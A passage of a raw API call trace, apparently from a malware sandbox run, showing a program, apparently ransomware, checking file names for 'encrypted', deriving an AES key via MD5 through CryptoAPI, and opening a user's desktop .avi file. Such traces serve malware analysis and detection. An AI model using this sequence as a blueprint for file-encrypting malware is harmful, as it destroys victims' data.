(Locale=0x400, dwCmpFlags=0x1, lpString1="tf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0030.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0030.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.894] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.894] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0030.894] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.894] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.894] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.894] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.894] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.894] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.894] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.894] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca047e90, ftCreationTime.dwHighDateTime=0x1d5bec3, ftLastAccessTime.dwLowDateTime=0xa4c0b630, ftLastAccessTime.dwHighDateTime=0x1d5b838, ftLastWriteTime.dwLowDateTime=0xa4c0b630, ftLastWriteTime.dwHighDateTime=0x1d5b838, nFileSizeHigh=0x0, nFileSizeLow=0x15b28, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="seoYHLX7CEV1iLpfdx.avi", cAlternateFileName="SEOYHL~1.AVI")) returned 0x7c2240 [0030.894] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0030.895] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.895] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.895] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.895] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.895] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0030.895] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.895] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0030.895] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.895] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.895] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0030.895] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.895] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.895] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.895] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.895] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.895] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0030.895] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.895] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0030.896] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.896] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.896] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0030.896] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.896] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.896] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.896] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.896] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.896] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.896] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.896] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.897] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.897] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.897] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.897] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.897] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0030.897] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.897] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.897] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.897] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.897] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.897] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.897] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.897] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.897] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.897] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.897] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.897] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.897] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.897] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.897] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.897] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.897] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.897] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.897] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.897] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0030.898] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.898] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.898] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.898] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.898] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0030.898] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.898] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.898] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.898] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.898] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.898] CryptHashData (hHash=0x7c2100, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0030.898] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.898] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.898] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.898] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.898] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.898] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.898] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.898] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.898] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0030.898] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.898] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.898] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.899] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.899] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.899] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.899] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0030.899] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.899] CryptDestroyHash (hHash=0x7c2100) returned 1 [0030.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0030.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0030.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0030.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0030.899] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0030.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0030.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0030.899] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0030.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0030.899] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.899] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.899] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0030.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0030.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0030.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.899] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\seoyhlx7cev1ilpfdx.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.900] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.900] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0030.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0030.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0030.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0030.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.900] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0030.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0030.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0030.900] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0030.900] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0030.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0030.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.900] RtlAllocateHeap (HeapHandle=0x770000, 